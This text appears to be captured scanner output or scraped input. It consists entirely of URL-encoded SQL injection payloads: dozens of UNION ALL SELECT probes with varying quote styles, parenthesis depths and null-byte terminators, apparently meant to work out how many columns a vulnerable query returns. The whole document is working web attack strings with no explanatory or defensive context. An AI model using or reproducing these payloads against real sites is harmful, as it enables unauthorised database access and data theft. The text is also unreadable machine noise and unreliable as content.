-6858%27%29%20UNION%20ALL%20SELECT%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%2C%201274%00%20AND%20%28%27zIUw%27%20LIKE%20%27zIUw -6350%27%29%20UNION%20ALL%20SELECT%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%2C%205827%00%20AND%20%28%27jqim%27%20LIKE%20%27jqim -8717%27%29%20UNION%20ALL%20SELECT%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%2C%207992%00%20AND%20%28%27eiAT%27%20LIKE%20%27eiAT -4638%27%29%20UNION%20ALL%20SELECT%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%2C%201132%00%20AND%20%28%27QneC%27%20LIKE%20%27QneC -2465%27%29%20UNION%20ALL%20SELECT%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%2C%203526%00%20AND%20%28%27aONP%27%20LIKE%20%27aONP -3565%27%29%29%20UNION%20ALL%20SELECT%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%2C%201958%00%20AND%20%28%28%27qfJp%27%20LIKE%20%27qfJp -5821%27%29%29%20UNION%20ALL%20SELECT%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%2C%201503%00%20AND%20%28%28%27zBtY%27%20LIKE%20%27zBtY -5027%27%29%29%20UNION%20ALL%20SELECT%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%2C%204630%00%20AND%20%28%28%27xnYz%27%20LIKE%20%27xnYz -5256%27%29%29%20UNION%20ALL%20SELECT%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%2C%209364%00%20AND%20%28%28%27pPuR%27%20LIKE%20%27pPuR -1101%27%29%29%20UNION%20ALL%20SELECT%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%2C%209698%00%20AND%20%28%28%27vUaF%27%20LIKE%20%27vUaF -6864%27%29%29%20UNION%20ALL%20SELECT%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%00%20AND%20%28%28%27gWrY%27%20LIKE%20%27gWrY -2966%27%29%29%20UNION%20ALL%20SELECT%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%2C%202786%00%20AND%20%28%28%27cgfx%27%20LIKE%20%27cgfx -4006%27%29%29%20UNION%20ALL%20SELECT%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%2C%203967%00%20AND%20%28%28%27mFyE%27%20LIKE%20%27mFyE -4119%27%29%29%20UNION%20ALL%20SELECT%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%2C%206505%00%20AND%20%28%28%27vuTT%27%20LIKE%20%27vuTT -8132%27%29%29%20UNION%20ALL%20SELECT%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%2C%204460%00%20AND%20%28%28%27zlVR%27%20LIKE%20%27zlVR -5220%27%29%29%29%20UNION%20ALL%20SELECT%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%2C%205255%00%20AND%20%28%28%28%27yyID%27%20LIKE%20%27yyID -1074%27%29%29%29%20UNION%20ALL%20SELECT%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%2C%207392%00%20AND%20%28%28%28%27yCTs%27%20LIKE%20%27yCTs -5438%27%29%29%29%20UNION%20ALL%20SELECT%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%00%20AND%20%28%28%28%27DqJC%27%20LIKE%20%27DqJC -9875%27%29%29%29%20UNION%20ALL%20SELECT%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%2C%202789%00%20AND%20%28%28%28%27NjRK%27%20LIKE%20%27NjRK -5700%27%29%29%29%20UNION%20ALL%20SELECT%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%2C%207606%00%20AND%20%28%28%28%27vHwd%27%20LIKE%20%27vHwd -5985%27%29%29%29%20UNION%20ALL%20SELECT%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%2C%206910%00%20AND%20%28%28%28%27LRCv%27%20LIKE%20%27LRCv -6380%27%29%29%29%20UNION%20ALL%20SELECT%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%2C%209562%00%20AND%20%28%28%28%27KOkj%27%20LIKE%20%27KOkj -9611%27%29%29%29%20UNION%20ALL%20SELECT%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%00%20AND%20%28%28%28%27WKoH%27%20LIKE%20%27WKoH -8431%27%29%29%29%20UNION%20ALL%20SELECT%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%2C%207781%00%20AND%20%28%28%28%27ARod%27%20LIKE%20%27ARod -5184%27%29%29%29%20UNION%20ALL%20SELECT%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%00%20AND%20%28%28%28%27wTdl%27%20LIKE%20%27wTdl -4758%27%20UNION%20ALL%20SELECT%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%2C%207615%00%20AND%20%27xJqg%27%20LIKE%20%27xJqg -6368%27%20UNION%20ALL%20SELECT%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%2C%204539%00%20AND%20%27IfyW%27%20LIKE%20%27IfyW -1622%27%20UNION%20ALL%20SELECT%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%2C%208978%00%20AND%20%27VKIy%27%20LIKE%20%27VKIy -6434%27%20UNION%20ALL%20SELECT%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%2C%208933%00%20AND%20%27zHsm%27%20LIKE%20%27zHsm -2761%27%20UNION%20ALL%20SELECT%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%2C%201600%00%20AND%20%27JOQI%27%20LIKE%20%27JOQI -6938%27%20UNION%20ALL%20SELECT%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%2C%201730%00%20AND%20%27Rjei%27%20LIKE%20%27Rjei -7676%27%20UNION%20ALL%20SELECT%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%2C%203734%00%20AND%20%27XeNS%27%20LIKE%20%27XeNS -8479%27%20UNION%20ALL%20SELECT%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%2C%203848%00%20AND%20%27VOyz%27%20LIKE%20%27VOyz -3369%27%20UNION%20ALL%20SELECT%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%2C%203919%00%20AND%20%27fbPc%27%20LIKE%20%27fbPc -9910%27%20UNION%20ALL%20SELECT%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%2C%201517%00%20AND%20%27fwAt%27%20LIKE%20%27fwAt -9981%22%29%20UNION%20ALL%20SELECT%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%2C%205297%00%20AND%20%28%22Pukz%22%3D%22Pukz -1730%22%29%20UNION%20ALL%20SELECT%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%2C%209135%00%20AND%20%28%22RGFu%22%3D%22RGFu -1821%22%29%20UNION%20ALL%20SELECT%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%2C%207846%00%20AND%20%28%22bdbF%22%3D%22bdbF -7123%22%29%20UNION%20ALL%20SELECT%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%2C%204318%00%20AND%20%28%22fzDy%22%3D%22fzDy -5433%22%29%20UNION%20ALL%20SELECT%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%00%20AND%20%28%22WiXq%22%3D%22WiXq -7842%22%29%20UNION%20ALL%20SELECT%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%2C%206350%00%20AND%20%28%22UVCf%22%3D%22UVCf -8180%22%29%20UNION%20ALL%20SELECT%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%00%20AND%20%28%22hMou%22%3D%22hMou -3153%22%29%20UNION%20ALL%20SELECT%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%2C%208394%00%20AND%20%28%22NJBf%22%3D%22NJBf -4653%22%29%20UNION%20ALL%20SELECT%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%00%20AND%20%28%22txhM%22%3D%22txhM -6300%22%29%20UNION%20ALL%20SELECT%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%00%20AND%20%28%22wKtg%22%3D%22wKtg -5955%22%29%29%20UNION%20ALL%20SELECT%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%2C%209439%00%20AND%20%28%28%22IWOC%22%3D%22IWOC -6236%22%29%29%20UNION%20ALL%20SELECT%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%2C%205457%00%20AND%20%28%28%22SGnx%22%3D%22SGnx -2049%22%29%29%20UNION%20ALL%20SELECT%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%2C%201852%00%20AND%20%28%28%22zgtE%22%3D%22zgtE -5385%22%29%29%20UNION%20ALL%20SELECT%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%2C%206700%00%20AND%20%28%28%22QFoY%22%3D%22QFoY -7205%22%29%29%20UNION%20ALL%20SELECT%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%2C%202420%00%20AND%20%28%28%22yXxv%22%3D%22yXxv -3124%22%29%29%20UNION%20ALL%20SELECT%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%2C%201222%00%20AND%20%28%28%22evDo%22%3D%22evDo -8591%22%29%29%20UNION%20ALL%20SELECT%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%00%20AND%20%28%28%22SrDN%22%3D%22SrDN -9393%22%29%29%20UNION%20ALL%20SELECT%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%2C%205021%00%20AND%20%28%28%22XHdv%22%3D%22XHdv -7459%22%29%29%20UNION%20ALL%20SELECT%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%2C%204387%00%20AND%20%28%28%22orUY%22%3D%22orUY -2617%22%29%29%20UNION%20ALL%20SELECT%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%2C%206672%00%20AND%20%28%28%22HPFL%22%3D%22HPFL -9198%22%29%29%29%20UNION%20ALL%20SELECT%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%00%20AND%20%28%28%28%22FBsp%22%3D%22FBsp 